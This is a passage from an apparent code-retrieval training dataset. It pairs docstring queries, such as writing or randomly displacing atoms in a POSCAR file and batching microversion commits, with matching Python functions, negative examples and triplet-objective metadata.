"def calculate_percent_follow_in_annual(annual_raster_path, fallow_in_annual_path):\n\n annual_pixels = get_annual_pixels(annual_raster_path)\n fallow_in_annual_pixels = get_fallow_in_annual_pixels(fallow_in_annual_path)\n\n percent_fallow_in_annual = 100 * (fallow_in_annual_pixels / annual_pixels)\n \n return(percent_fallow_in_annual)",
"def overallCodonPercent():\n count = overallCodonUse()\n total = sum(count)\n percent = [c/total for c in count]\n return percent",
"def ambient_humidity_percent(self) -> float:\n data = self._traits_data(HumidityMixin.NAME)\n return data[AMBIENT_HUMIDITY_PERCENT]",
"def patch_bk_ratio(img, bk_thresh=0.80):\n g_img = color.rgb2gray(img)\n bk_pixel_num = np.sum(g_img > bk_thresh)\n pixel_num = g_img.size\n background_ratio = bk_pixel_num / pixel_num\n return background_ratio",
"def get_hand_gradient_percentage(self, skeleton):\n return (skeleton.get_hand_gradient() * 100.0) / 2.0"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Return path of stored dataset images.
|
def orig_img_path(self):
_dataset = 'VG' if 'VG' in self.dataset else self.dataset
return osp.join(self.prerequisites_path, _dataset, 'images', '')
|
[
"def getDataPath(self, img): \n if self.__singleMode:\n return os.path.join(GG.utils.DATA_PATH, img)\n else:\n pathFile = os.path.join(GG.utils.LOCAL_DATA_PATH, img)\n if not os.path.isfile(pathFile):\n imgData = self.__system.getResource(img) \n if imgData:\n if not os.path.isdir(os.path.dirname(pathFile)):\n GG.utils.createRecursiveDir(os.path.dirname(pathFile))\n imgFile = open(pathFile, \"wb\")\n imgFile.write(imgData)\n imgFile.close()\n else:\n return GG.utils.IMG_ERROR\n return pathFile",
"def img_dir() -> Path:\n path = Path().resolve()\n return path / \"cellseg_models_pytorch/inference/tests/data\"",
"def _path(filename):\n fn = os.path.join(\"datasets\", filename)\n return [fn] if os.path.exists(fn) else []",
"def get_dataset_file_path() -> str:\n name = __DATASET_FILE__\n return os.path.join(get_project_root(), __COLOR_DATASET_FOLDER__ , name)",
"def path(self) -> str:\n return os.path.abspath(os.path.join(self.image_directory, self.filename))",
"def _getDataStorageDirectoryName(self):\n return self.COMPLEMENTARY_FILES",
"def get_dataset_dir():\n # current_dir = get_project_dir()\n # return os.path.join(current_dir, 'data')\n datadir_base = os.path.expanduser(os.path.join('~', '.keras'))\n return os.path.join(datadir_base, 'datasets')",
"def image_path(self) -> str:\r\n return path.join(self.output_path, \"image\")",
"def ai_data_directory(self) -> pathlib.Path:",
"def get_data_path():\n\n return DATA_PATH",
"def ds_to_db_path(cls, datastore):\n return os.path.join(\"/vmfs/volumes\", datastore, vmdk_ops.DOCK_VOLS_DIR, CONFIG_DB_NAME)",
"def storage_path(cls) -> str:\n return super().storage_path()",
"def dataset_files(self):\n return self._dataset_files",
"def store_path(self):\n return path_join(self.home, \"data\", \"databases\",\n self.get_config(\"dbms.active_database\", \"graph.db\"))",
"def _get_default_path(self):\n return os.path.join('/mnt/saturn/datasets/MSCOCO');",
"def get_path(filename, folder):\n return IMAGE_SET.path(filename, folder)",
"def get_data_files_path():\n return _os.path.dirname(_inspect.getfile(_sys._getframe(1)))",
"def blob_path(self) -> str:\n return pulumi.get(self, \"blob_path\")",
"def image_path_at(self, i):\n imgName = self.imgNames[self.image_id_at(i)]\n imgPath = osp.join(self.splitPath, \"image\", imgName)\n\n # print(\"Path:\\n\")\n # print(imgPath)\n\n return imgPath"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Return upper limit of examined relations in a train image.
|
def relations_per_img_limit(self):
return 2000
|
[
"def MaximumThreshold(self) -> int:",
"def upper_limit_points(self):\n return self._upper_limit_points",
"def max_size(self):\n return self.info_sliced.largest_intermediate",
"def getJointUpperLimit(self, jointName):\n return self.getJointInfo(jointName)[9]",
"def get_upperbound(self) -> int:",
"def getTargetMaximumNumberOfPageLOD(self):\r\n return _osgDB.DatabasePager_getTargetMaximumNumberOfPageLOD(self)",
"def max_node_capture_assists(self):\r\n return self.data.maxNodeCaptureAssist",
"def MaxBoundsY(self) -> float:",
"def max_ripples():\r\n return 8",
"def max_length(self) -> float:",
"def max_raindrops():\r\n return 100",
"def max_utility(self):\n return 100",
"def get_upper_bound(self) -> _ARRAY:\n return self._upper_bound",
"def getLMax(self,maxLmax=10):\n return min( max( [ 2*xL['L'] for xL in self.Ls ] ), maxLmax )",
"def upper_limit_value(self):\n return self._upper_limit_value",
"def blobs_max(self):\n ret_val = self._blobs_max()\n return ret_val",
"def rebounds_max(self):\n if self._games is None:\n raise TypeError('games has not been set')\n return self._games['rebounds'].max()",
"def maxParallax():\n return self.upParallax",
"def PreviewUpperLimit(self):\n if self.force_auto_sync:\n self.get('PreviewUpperLimit')\n return self._PreviewUpperLimit"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Write the contents of poscar to filename.
|
def write_POSCAR(poscar,filename):
global hashes
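    # Build the POSCAR body in an in-memory buffer first; if the 'hashes' flag is set,
    # the SHA1 of that body is used as the comment/header line of the written file.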
f=StringIO()
f.write("1.0\n")
for i in range(3):
f.write("{0[0]:>20.15f} {0[1]:>20.15f} {0[2]:>20.15f}\n".format(
(poscar["lattvec"][:,i]).tolist()))
f.write("{0}\n".format(" ".join(poscar["elements"])))
f.write("{0}\n".format(" ".join([str(i) for i in poscar["numbers"]])))
f.write("Direct\n")
for i in range(poscar["positions"].shape[1]):
f.write("{0[0]:>20.15f} {0[1]:>20.15f} {0[2]:>20.15f}\n".format(
poscar["positions"][:,i].tolist()))
if hashes:
header=hashlib.sha1(f.getvalue().encode()).hexdigest()
else:
header=filename
with open(filename,"w") as finalf:
finalf.write("{0}\n".format(header))
finalf.write(f.getvalue())
f.close()
|
[
"def __writeToFile(self, score):\n with open(self.file, \"w\") as f:\n f.write(str(score))",
"def save(self, filename):\n\t\tself.getZ().write(filename)",
"def write_file(self, filepath, contents):\n with open(filepath, 'w') as f:\n f.write(contents.getvalue())",
"def to_file(filename, concordance):\n out = open(filename, 'w')\n out.write(to_string(concordance))\n out.close()",
"def writeOutput(message):\r\n try:\r\n print(message)\r\n fileOutput = open(HOME_FOLDER + \".pomobaroutput\", \"w\")\r\n fileOutput.write(message)\r\n fileOutput.close()\r\n except Exception as e:\r\n print(e)",
"def write_file(filename: str, contents: str) -> None:\n with open(filename, 'w') as f: f.write(contents)",
"def write_file(name, contents):\n with open(name, \"w\") as f:\n f.write(contents)",
"def _write(self, filename):\n\n loc = self.config[\"data_specs\"][\"out_loc\"] \n if \"s3://\" in loc.lower():\n s3 = boto3.resource('s3')\n splitted = loc.split(\"/\")\n bucket = splitted[2]\n key = \"/\".join(splitted[3:])\n key_divider = \"/\" if splitted[-1] else \"\"\n destination = \"{0}{1}{2}\".format(key, key_divider, filename)\n if filename.split(\".\")[-1] in [\"obj\", \"json\"]:\n with open(\"{0}/{1}\".format(tmpdir, filename), \"rb\") as data:\n s3.meta.client.upload_fileobj(data, bucket, destination)\n else:\n s3.meta.client.upload_file(\"{0}/{1}\".format(tmpdir, filename), bucket, destination)\n else:\n shutil.copyfileobj(\n open(\"{0}/{1}\".format(tmpdir, filename), \"rb\"), \n open(\"{0}/{1}\".format(\n loc[:-1] if loc[-1] == \"/\" else loc, \n filename), \"wb\")) \n os.remove(\"{0}/{1}\".format(tmpdir, filename))",
"def generate_POSCAR(formu,out_matrix,final_string,structure_string,material_id):\n out_name='POSCAR.'+material_id+'_'+formu\n out_name='POSCAR_files/'+out_name.replace(' ','')\n print(out_name)\n openfile = open(out_name,'wt')\n openfile.write(formu+'\\n')\n openfile.write('1.0'+'\\n')\n openfile.write(out_matrix+'\\n')\n openfile.write(final_string+'\\n')\n openfile.write('direct'+'\\n')\n openfile.write(structure_string+'\\n')\n openfile.close()",
"def write_to_files(self,catalog,input):\n\n\n\n metadata = self.metadata({'filename':self.uuid})\n catalog.write(json.dumps(metadata) + \"\\n\")\n text = self.parsed.get_payload().replace(\"\\n\",\"\\\\n\\\\n\").replace(\"\\t\",\" \")\n input.write(metadata['filename'] + \"\\t\" + text.encode(\"utf-8\",\"ignore\") + \"\\n\")",
"def writetofile(self, styname=\"pytem.sty\"):\n with open(styname, \"w\") as f:\n f.write(\n HEADER.format(self._name, datetime.datetime.now().strftime(DATEFMT))\n )\n f.write(START)\n for key in self._dict:\n if isinstance(self._dict[key], list):\n f.write(COMMAND.format(key, \", \".join(self._dict[key])))\n else:\n f.write(COMMAND.format(key, self._dict[key]))",
"def convertOutputsToPoscar(self):\n for name in glob('enum/vasp.0*'):\n structNum = str(self.retrieveStructNum(name))\n if structNum>0:\n self.changeToPoscar(name) \n for i in xrange(len(self.s2pStructList)):\n if self.contains(structNum, self.s2pStructList[i]):\n structDir = os.getcwd() + '/' + self.atoms[i] + '/' + structNum\n if os.path.isdir(structDir):\n subprocess.call('rm -r ' + structDir + '/*', shell=True)\n else:\n subprocess.call(['mkdir', structDir]) \n \n subprocess.call(['cp','POSCAR',structDir])\n self.s2pStructList[i].remove(str(structNum))\n \n subprocess.call(['rm',name])\n subprocess.call(['rm','POSCAR'])",
"def write_to_file(self, data):",
"def save_to_file(filename: str, key: bytes, contents: bytes,\n N=1024, r=8, p=1):\n with pyscrypt.ScryptFile(filename, key, N, r, p) as file:\n file.write(contents)",
"def write(self, title, content):\n title = re.sub('[\\.\\\\,\\?/`~!@#$%\\^\\&\\*\\+\\=;:\\'\\\"\\{\\}<>\\|\\s]', '', title, flags=re.IGNORECASE)\n fn = '{title}_{id}.{ext}'.format(title=title, id=self.n, ext=self.file_ext)\n p = os.path.join(self.folder, fn)\n\n with open(p, 'w', encoding=self.encoding) as f:\n f.write(content)\n\n if self.verbose:\n print(self.n, fn)",
"def write(self, filename='subspace.pkl'):\n cPickle.dump(self, open(filename, 'wb'))",
"def write_obj_to_file(strobj):\n tiedosto = 'countryobjs.txt'\n filename = os.path.expanduser('~/') + tiedosto\n try:\n file = open(filename, 'a')\n file.writelines(f\"{strobj}\\n\")\n file.close()\n except Exception as e:\n print(f\"Failed to write to file: {tiedosto}\")",
"def savetxt(self, filename):\n with open(filename, \"w\") as fout:\n for obj in self.atom_to_obj:\n fout.write(\"%s\\n\" % obj)",
"def write(self, filename, type_='obo'): #FIXME this is bugged\n if os.path.exists(filename):\n name, ext = filename.rsplit('.',1)\n try:\n prefix, num = name.rsplit('_',1)\n n = int(num)\n n += 1\n filename = prefix + '_' + str(n) + '.' + ext\n except ValueError:\n filename = name + '_1.' + ext\n print('file exists, renaming to %s' % filename)\n self.write(filename)\n\n else:\n with open(filename, 'wt', encoding='utf-8') as f:\n if type_ == 'obo':\n f.write(str(self)) # FIXME this is incredibly slow for big files :/\n elif type_ == 'ttl':\n f.write(self.__ttl__())\n else:\n raise TypeError('No exporter for file type %s!' % type_)",
"def write_c_file(self, filename):\n with open(filename,'w') as fobj:\n text=self.get_c_text()\n fobj.write(text)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Return a copy of poscar with each atom iat displaced by a random amount (in Å) along its icoordth Cartesian coordinate.
|
def move_atoms(poscar):
nruter=copy.deepcopy(poscar)
displist = np.array([0.,0,0])
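    # displist starts with a dummy zero row; it is dropped below (displist[1:]) when
    # the per-atom displacement list is stored on the returned structure.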
ntot = nruter["positions"].shape[1]
for iat in range(ntot):
disp = (0.01 * np.random.randn(3) + 0.03) * random_sign()
        displist = np.vstack((displist,disp))  # note: repeated vstack can be slow for very large systems
nruter["positions"][:,iat]+=scipy.linalg.solve(nruter["lattvec"],
disp)
nruter['displist'] = displist[1:]
#nruter['u_0'] = np.max(displist[1:])
return (nruter)
|
[
"def initiate_atoms_randomly(self,quantitiy):\n coords=[]\n for i in range(np.shape(self.grid)[0]):\n for j in range(np.shape(self.grid)[1]):\n coords.append([i,j])\n np.random.shuffle(coords)#shuffles created coords without repetitions\n for i in range(quantitiy-1):\n self.list_of_atoms.append(atom(*(coords[i])))\n self.grid[coords[i][0],coords[i][1]]=1",
"def position_atoms(self):\n atoms = []\n for i in range(self._atoms):\n x = random.randint(1,8)\n y = random.randint(1,8)\n atoms.append([x,y])\n return atoms",
"def random_polar_coordinates_xyz():\r\n r = random()\r\n theta = uniform(0, 2 * math.pi)\r\n x = round(math.sqrt(r) * math.cos(theta) * DISC_RADIUS, 3)\r\n y = round(math.sqrt(r) * math.sin(theta) * DISC_RADIUS, 3)\r\n z = round(uniform(0, DISC_HEIGHT), 3)\r\n return x, y, z",
"def _get_random_displacements(self, ndata, mode=\"gauss\"):\n disp_xyz = np.zeros(3)\n disp_random = np.zeros((ndata, self._supercell.nat, 3))\n\n if mode == \"gauss\":\n for idata in range(ndata):\n for i in range(self._supercell.nat):\n for j in range(3):\n # Generate a random number following the Gaussian distribution\n disp_xyz[j] = random.gauss(0.0, 1.0)\n\n # Normalize the random displacement so that it has the norm\n # of self._displacement_magnitude.\n norm = np.linalg.norm(disp_xyz)\n disp_random[idata, i, :] = disp_xyz[:] / norm * self._displacement_magnitude\n\n # Transform to the fractional coordinate\n disp_random[idata, i] = np.dot(disp_random[idata, i],\n self._supercell.inverse_lattice_vector.transpose())\n\n elif mode == \"uniform\":\n for idata in range(ndata):\n for i in range(self._supercell.nat):\n for j in range(3):\n # Generate a random number following the Gaussian distribution\n disp_xyz[j] = random.uniform(-self._displacement_magnitude,\n self._displacement_magnitude)\n\n # Transform to the fractional coordinate\n disp_random[idata, i] = np.dot(disp_xyz[:],\n self._supercell.inverse_lattice_vector.transpose())\n else:\n raise RuntimeError(\"Invalid option for the random number distribution types.\")\n\n return disp_random",
"def rotaiton_layer(circ):\n random_points0 = np.random.randint(0, len(single_rotatoins), circ.num_qubits)\n random_points1 = np.random.randint(0, len(single_rotatoins), circ.num_qubits)\n for ii in range(circ.num_qubits):\n single_rotatoins[random_points0[ii]](ii)\n single_rotatoins[random_points1[ii]](ii)",
"def __generateCarrots(self):\n\t\tfor i in range(self.carrotNumber):\n\t\t\tc = Carrot(self, 0, 0)\n\t\t\tc.reposition(self, Panda.pandaList, Spike.spikeNormalList)",
"def army_shuffle(self):\n for first in xrange(len(self.tiles)):\n second = random.randint(0, first)\n self.tiles[first], self.tiles[second] = self.tiles[second], self.tiles[first]",
"def __init__(self, paises_por_tarjeta):\n self.pila = []\n self.descarte = []\n for clave in paises_por_tarjeta:\n for elem in paises_por_tarjeta[clave]:\n tarjeta = Tarjeta(elem, clave)\n self.pila.append(tarjeta)\n random.shuffle(self.pila)",
"def random_pos(self):\n temp = 0\n while temp < len(self.objects):\n line = random.randint(0, 14)\n column = random.randint(0, 14)\n if self.object_position(line, column, self.objects[temp].letter):\n temp += 1",
"def random(self):\r\n if self.ate_apple:\r\n self.x = 20 * random.randint(0, 23)\r\n self.y = 20 * random.randint(3, 23)",
"def project_by_random_matrix(photon_zyxs, distort=None, debug=False):\n rand_axis = np.random.normal(size=3)\n if distort is not None:\n if 'quadrupole' in distort:\n rand_axis *= distort['quadrupole']\n if 'dipole' in distort:\n rand_axis += distort['dipole']\n rand_axis /= np.sqrt(np.dot(rand_axis, rand_axis))\n rand_angle = np.random.uniform(0, 2 * np.pi) + 1 # 0 to 2pi can scale by 0\n\n rot_matrix = angle_axis_to_matrix(rand_angle*rand_axis)\n proj_matrix = rot_matrix[:, 1:3].T # first two cols (arbitrary)\n\n if debug:\n return rand_axis, rot_matrix, proj_matrix\n\n projected_yxs = np.dot(proj_matrix, photon_zyxs.T).T\n\n return projected_yxs",
"def sample_orbit_rotation(self):\n return np.random.random(size=self.number_of_stars) * 2 * np.pi",
"def _generate_pores(self):\n Nx = self._Nx\n Ny = self._Ny\n Nz = self._Nz\n Lc = self._Lc\n Np = Nx*Ny*Nz\n ind = sp.arange(0,Np)\n self.set_pore_data(prop='numbering',data=ind)\n self.set_pore_info(label='all',locations=sp.ones_like(ind))\n pore_coords = Lc/2+Lc*sp.array(sp.unravel_index(ind, dims=(Nx, Ny, Nz), order='F'),dtype=sp.float64).T\n self.set_pore_data(prop='coords',data=pore_coords)",
"def point_mutation(self, clone, mutation_rate):\r\n for i in range(0, len(clone.paratopes)):\r\n if random() < mutation_rate:\r\n clone.paratopes[i] = self.rand_paratope()\r\n return clone",
"def __make_position_list(self):\n res = list()\n for i in range(self.board_size):\n for j in range(self.board_size):\n res.append((i, j))\n np.random.shuffle(res)\n return res",
"def randomCircuit(self,):\n circuit = []\n\n # hadamard zone\n for i in range(self.numAncillas):\n circuit.append(self.HAD(i))\n\n # cswap zone\n for i in range(int(self.depth)):\n control = random.randint(0, self.numAncillas - 1)\n targets = [random.randint(self.numAncillas, self.numAncillas + self.numInputs - 1)]\n t2 = random.randint(self.numAncillas, self.numAncillas + self.numInputs - 1)\n while t2 == targets[0]:\n t2 = random.randint(self.numAncillas, self.numAncillas + self.numInputs - 1)\n targets.append(t2)\n circuit.append(self.CSWAP(control, targets))\n\n return circuit",
"def mutate(self):\n r = randint(1, 2)\n for i in range(0, r):\n p1 = randint(1, len(self.cities()) - 1)\n p2 = randint(1, len(self.cities()) - 1)\n self.cities()[p1:p2] = reversed(self.cities()[p1:p2])\n\n self.calculate_distance()",
"def puntosCirculo( centro, npuntos, r, etiqueta):\r\n\tfor i in range(npuntos):\r\n\t\txnew= np.random.uniform(-r+centro[0], r+centro[0])\r\n\t\tytop=np.sqrt((r**2) - (xnew-centro[0])**2)+centro[1]\r\n\t\tylow=-(np.sqrt((r**2) - (xnew-centro[0])**2))+centro[1]\r\n\t\tynew=np.random.uniform(ylow, ytop)\r\n\t\tif i ==0:\r\n\t\t\tpuntos=np.array([xnew, ynew, etiqueta])\r\n\t\telse:\r\n\t\t\tpuntos= np.vstack( (puntos, np.array([xnew, ynew, etiqueta]) ))\r\n\t\r\n\treturn( puntos )",
"def __init__(self, \n atoms,\n elements = None, \n atom_distortion=0.2, \n lattice_distortion=0.10,\n shrink_bias = 0.25, \n deletion_chance=0.05, \n rcut=6.5, \n volume_change_max = 0.05, \n flip_chance = 0.10,\n swap_chance = 0.05,\n min_cells = 2,\n random_seed = None):\n self.atoms = atoms\n if isinstance(random_seed, int):\n np.random.seed(random_seed)\n self.atoms_out = self.random_super_cell(self.atoms, rcut, min_cells)\n \n self.random_deletion(self.atoms_out, deletion_chance)\n \n self.random_distortion(self.atoms_out, \n atom_distortion, \n lattice_distortion, \n volume_change_max,\n shrink_bias)\n \n if elements == None:\n el = atoms.get_chemical_symbols()\n elements = list(set(el))\n \n self.random_swaps(self.atoms_out, elements, swap_chance)\n \n if flip_chance:\n self.random_magnetic_moment_flips(self.atoms_out, flip_chance)",
"def do_random_object_pose(self, context, passive_box, safty_margin=[0,0,0], xyz_manipulator=[0,0,0]):\n x = passive_box.location[0] + xyz_manipulator[0] + randint(-round(passive_box.dimensions[0]*(0.5-(safty_margin[0]/2))), round(passive_box.dimensions[0]*(0.5-(safty_margin[0]/2))))\n y = passive_box.location[1] + xyz_manipulator[1] + randint(-round(passive_box.dimensions[1]*(0.5-(safty_margin[1]/2))), round(passive_box.dimensions[1]*(0.5-(safty_margin[1]/2))))\n z = passive_box.location[2] + xyz_manipulator[2] + randint(round(passive_box.dimensions[2]*safty_margin[2]), round(passive_box.dimensions[2]*safty_margin[2] + passive_box.dimensions[2]/2)) # randint(-round(passive_box.dimensions[2]*(0.5-(safty_margin[2]/2))), round(passive_box.dimensions[2]*(0.5-(safty_margin[2]/2))))\n alpha = radians(randint(-90, 90))\n beta = radians(randint(-90, 90))\n gamma = radians(randint(-90, 90))\n return [x, y, z], [alpha, beta, gamma]"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Process a batch of microversion tasks and commit them.
|
def process_data(max_tasks=DEFAULT_MAX_TASKS, allow_transient_errors=False):
vcs = versions.VersionControlService()
queue = taskqueue.Queue(TASKQUEUE_NAME)
# The size of this list will be O(max changes of the same file path).
# A new changeset is added for each change to the same file, within the set
# of leased tasks.
changesets = [vcs.new_staging_changeset()]
# Grab the oldest tasks and reorder in chronological order.
# TODO(user): do pull queues guarantee native ordering already?
try:
tasks = queue.lease_tasks(
lease_seconds=TASKQUEUE_LEASE_SECONDS, max_tasks=max_tasks)
tasks = sorted(tasks, key=lambda t: pickle.loads(t.payload)['time'])
except taskqueue.TransientError:
if allow_transient_errors:
return False
raise
results = []
successful_tasks = []
for task in tasks:
level = 0
microversion_data = pickle.loads(task.payload)
microversion_data.pop('time')
path = microversion_data['file_kwargs']['path']
while True:
if not path in changesets[level].associated_paths:
break
else:
# We've seen this file change before, ascend one level of changesets.
level += 1
if level == len(changesets):
changesets.append(vcs.new_staging_changeset())
try:
_write_microversion(changeset=changesets[level], **microversion_data)
results.append({'path': path, 'changeset': changesets[level]})
successful_tasks.append(task)
except Exception as e:
logging.exception('Microversion for "%s" failed.', path)
results.append({'path': path, 'error': e})
for changeset in changesets:
if not changeset.associated_paths:
# Every file might have failed, so we would have an empty changeset.
# Allow this changeset to be orphaned.
continue
changeset.finalize_associated_files()
vcs.commit(changeset, save_manifest=False)
if successful_tasks:
queue.delete_tasks(successful_tasks)
# Exponential backoff will be triggered if this returns a null value.
return results
|
[
"def _submit_tasks(\n self,\n taskgroup_uuid: uuid.UUID | None,\n endpoint_uuid: uuid.UUID,\n user_endpoint_config: dict | None,\n futs: list[ComputeFuture],\n tasks: list[_TaskSubmissionInfo],\n ):\n if taskgroup_uuid is None and self.task_group_id:\n taskgroup_uuid = self.task_group_id\n\n batch = self.funcx_client.create_batch(\n taskgroup_uuid, user_endpoint_config, create_websocket_queue=True\n )\n submitted_futs_by_fn: t.DefaultDict[str, list[ComputeFuture]] = defaultdict(\n list\n )\n for fut, task in zip(futs, tasks):\n f_uuid_str = str(task.function_uuid)\n submitted_futs_by_fn[f_uuid_str].append(fut)\n batch.add(f_uuid_str, task.args, task.kwargs)\n log.debug(\"Added task to Globus Compute batch: %s\", task)\n\n try:\n batch_response = self.funcx_client.batch_run(endpoint_uuid, batch)\n except Exception as e:\n log.exception(f\"Error submitting {len(tasks)} tasks to Globus Compute\")\n for fut_list in submitted_futs_by_fn.values():\n for fut in fut_list:\n fut.set_exception(e)\n raise\n\n try:\n received_tasks_by_fn: dict[str, list[str]] = batch_response[\"tasks\"]\n new_tg_id: str = batch_response[\"task_group_id\"]\n except Exception as e:\n log.exception(\n f\"Server response ({batch_response}) missing an expected field\"\n )\n for fut_list in submitted_futs_by_fn.values():\n for fut in fut_list:\n fut.set_exception(e)\n raise\n\n if str(self.task_group_id) != new_tg_id:\n log.info(f\"Updating task_group_id from {self.task_group_id} to {new_tg_id}\")\n self.task_group_id = new_tg_id\n\n batch_count = sum(len(x) for x in received_tasks_by_fn.values())\n self.task_count_submitted += batch_count\n log.debug(\n \"Batch submitted to task_group: %s - %s (total: %s)\",\n self.task_group_id,\n batch_count,\n self.task_count_submitted,\n )\n\n for fn_id, fut_list in submitted_futs_by_fn.items():\n task_uuids = received_tasks_by_fn.get(fn_id)\n\n if task_uuids is None:\n fut_exc = Exception(\n f\"The Globus Compute Service ignored tasks for function {fn_id}!\"\n \" This 'should not happen,' so please reach out to the Globus\"\n \" Compute team if you are able to recreate this behavior.\"\n )\n for fut in fut_list:\n fut.set_exception(fut_exc)\n continue\n\n if len(fut_list) != len(task_uuids):\n fut_exc = Exception(\n \"The Globus Compute Service only partially initiated requested\"\n f\" tasks for function {fn_id}! It is unclear which tasks it\"\n \" honored, so marking all futures as failed. Please reach out\"\n \" to the Globus Compute team if you are able to recreate this\"\n \" behavior.\"\n )\n for fut in fut_list:\n fut.set_exception(fut_exc)\n continue\n\n # Happy -- expected -- path\n for fut, task_id in zip(fut_list, task_uuids):\n fut.task_id = task_id",
"def upload_transformed(self, releases: List[IrusOapenRelease], **kwargs) -> None:\n for release in releases:\n success = gcs_upload_files(\n bucket_name=self.cloud_workspace.transform_bucket,\n file_paths=[release.transform_path],\n )\n set_task_state(success, kwargs[\"ti\"].task_id, release=release)",
"def process(self, files):\n self.track_versions(files)\n astrodriz_params = [\"-n\", \"1\"]\n assoc = self.assoc_files(files)\n if assoc:\n self.run_stage1(*assoc)\n if self.stage2:\n args = astrodriz_params + assoc\n self.run_stage2(*args)\n return\n unassoc = self.unassoc_files(files)\n if unassoc:\n self.run_stage1(*unassoc)\n if self.stage2:\n args = astrodriz_params + unassoc\n self.run_stage2(*args)\n return",
"def _submit_batchtask(self, scriptfile, node):\n raise NotImplementedError",
"def do(task, subtasks):\n raise Exception('TODO IMPLEMENT ME !')",
"def process(self, files):\n raw = [os.path.basename(f) for f in files if f.endswith(\"_raw.fits\")]\n wav = [os.path.basename(f) for f in files if f.endswith(\"_wav.fits\")]\n if raw:\n self.track_versions(files, \"_raw\")\n self.run_stage1(*raw)\n else:\n self.track_versions(files, \"_wav\")\n self.run_stage1(*wav)",
"def reindex_all_files_to_process():\n FileProcessLock.lock()\n print str(datetime.now()), \"purging FilesToProcess:\", FilesToProcess.count()\n FileToProcess.db().drop()\n print str(datetime.now()), \"purging existing ChunksRegistry\", ChunksRegistry.count()\n ChunkRegistry.db().drop()\n\n pool = ThreadPool(CONCURRENT_NETWORK_OPS * 2 )\n\n print str(datetime.now()), \"deleting older chunked data:\",\n CHUNKED_DATA = s3_list_files(CHUNKS_FOLDER)\n print len(CHUNKED_DATA)\n pool.map(s3_delete, CHUNKED_DATA)\n del CHUNKED_DATA\n\n print str(datetime.now()), \"pulling new files to process...\"\n files_lists = pool.map(s3_list_files, [str(s._id) for s in Studies()] )\n print \"putting new files to process...\"\n for i,l in enumerate(files_lists):\n print str(datetime.now()), i+1, \"of\", str(Studies.count()) + \",\", len(l), \"files\"\n for fp in l:\n if fp[-4:] in PROCESSABLE_FILE_EXTENSIONS:\n FileToProcess.append_file_for_processing(fp, ObjectId(fp.split(\"/\", 1)[0]), fp.split(\"/\", 2)[1])\n del files_lists, l\n pool.close()\n pool.terminate()\n print str(datetime.now()), \"processing data.\"\n FileProcessLock.unlock()\n process_file_chunks()",
"async def _post_finished(self):\n for task in self._config.get('post_finished'):\n # Parsing the ansible-y format\n task_name = list(task.keys())[0]\n per_file = False\n # See if we need to run this task per-file\n # TODO: Need better way to do this\n for arg in task[task_name]:\n if ('${one_file}' in arg\n or '$one_file' in arg):\n per_file = True\n break\n\n if per_file:\n for one_file in self._tagged_files:\n task_args = self._arg_expand(\n task[task_name],\n one_file,\n all_files=list(self._tagged_files.keys()))\n # Create actual task after preprocessing args\n proc = await asyncio.create_subprocess_exec(\n task_name,\n *task_args)\n\n if await proc.wait() != 0:\n raise RipError('post_finished task {} failed'.format(\n task_name))\n else:\n task_args = self._arg_expand(\n task[task_name],\n '/dev/null',\n all_files=list(self._tagged_files.keys()))\n # Create actual task after preprocessing args\n proc = await asyncio.create_subprocess_exec(\n task_name,\n *task_args)\n\n if await proc.wait() != 0:\n raise RipError('post_finished task {} failed'.format(\n task_name))",
"def process_commits(repo: Repo, tags: List[Tag], commits: List[CommitInfo]):\n pass",
"def stage(self, files):\n for f in files:\n select_in_tree(self.tree, column=Commits.COLUMN_FILE, key=f)\n GPS.execute_action('vcs stage file')\n yield wait_tasks()",
"def task_execution(databases_connections, task_config):\n for task in task_config:\n print(\"Running task: {0}\".format(task.key))\n if task.e:\n print(\"\\tError occured in the task: {0}\".format(task.e))\n else:\n for con_key in task.parameters:\n if con_key in databases_connections.keys():\n try:\n connection = databases_connections[con_key]\n\n if \"targetConnections\" in task.parameters[con_key]:\n target_keys = task.parameters[con_key][\"targetConnections\"].replace(\" \", \"\").split(\",\")\n targets = []\n for key in target_keys:\n if str(key) in databases_connections:\n target_con = databases_connections[key]\n targets.append(target_con)\n else:\n raise Exception(\"{0} not in the connection list of: {1}\".format(key, databases_connections))\n # end\n task.parameters[con_key][\"targetConnections\"] = targets # convert to list of target arrays\n\n module = importlib.import_module(\"logic.migration\")\n class_ = getattr(module, task.key)\n instance = class_(connection, **task.parameters[con_key])\n\n except Exception as e:\n print(\"Task {0} caused an exception:\\n\\t{1}\".format(task.key, e))\n elif task.key == \"CompareCsv\":\n module = importlib.import_module(\"logic.migration\")\n class_ = getattr(module, task.key)\n instance = class_(**task.parameters[con_key])\n else:\n \n logging.debug(\"Task {0} with {1} not found\".format(task.key, con_key))",
"def submitTasks( self, transIDOPBody, clients ):\n transID = transIDOPBody.keys()[0]\n transBody = transIDOPBody[transID]['Body']\n method = 'submitTasks'\n\n tasksToSubmit = clients['TransformationClient'].getTasksToSubmit( transID, self.tasksPerLoop )\n self._logDebug( \"getTasksToSubmit(%s, %s) return value: %s\" % ( transID, self.tasksPerLoop, tasksToSubmit ),\n method = method, transID = transID )\n if not tasksToSubmit['OK']:\n self._logError( \"Failed to obtain tasks: %s\" % tasksToSubmit['Message'], transID = transID, method = method )\n return tasksToSubmit\n tasks = tasksToSubmit['Value']['JobDictionary']\n if not tasks:\n self._logVerbose( \"No tasks found for submission\", transID = transID, method = method )\n return tasksToSubmit\n self._logInfo( \"Obtained %d tasks for submission\" % len( tasks ), transID = transID, method = method )\n preparedTransformationTasks = clients['TaskManager'].prepareTransformationTasks( transBody, tasks,\n self.owner, self.ownerGroup, self.ownerDN )\n self._logDebug( \"prepareTransformationTasks return value: %s\" % preparedTransformationTasks,\n method = method, transID = transID )\n if not preparedTransformationTasks['OK']:\n self._logError( \"Failed to prepare tasks: %s\" % preparedTransformationTasks['Message'],\n transID = transID, method = method )\n return preparedTransformationTasks\n\n res = self.__actualSubmit( preparedTransformationTasks, clients, transID )\n\n res = clients['TaskManager'].updateDBAfterTaskSubmission( res['Value'] )\n self._logDebug( \"updateDBAfterTaskSubmission return value: %s\" % res, method = 